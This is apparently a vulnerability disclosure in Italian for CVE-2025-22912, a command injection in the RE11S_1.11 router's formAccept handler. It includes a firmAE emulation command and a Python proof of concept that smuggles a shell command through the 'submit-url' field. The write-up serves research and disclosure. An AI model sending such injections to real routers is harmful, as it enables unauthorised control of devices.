
CVE-2025-22912
Durante il mio tirocinio presso Qi An Xin Tiangong Lab, ho scoperto una vulnerabilità di command injection nel router RE11S_1.11.
Analizzando il file webs nella directory bin, ho scoperto che la funzione formAccept contiene una vulnerabilità di command injection.
La command injection può essere innescata dal valore della chiave submit-url, che porta a un'iniezione di comandi di sistema.

Usa il seguente comando per simulare con firmAE.
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
Il contenuto del file poc.py è il seguente:
import requests
url = "http://192.168.9.2/goform/formAccept"
data = {
"submit-url":"touch /tmp/xyq"
}
r = requests.post(url,data=data)
print(r.text)

Si può vedere che un file /tmp/xyq viene aggiunto dopo l'esecuzione, il che dimostra che l'attacco ha avuto successo.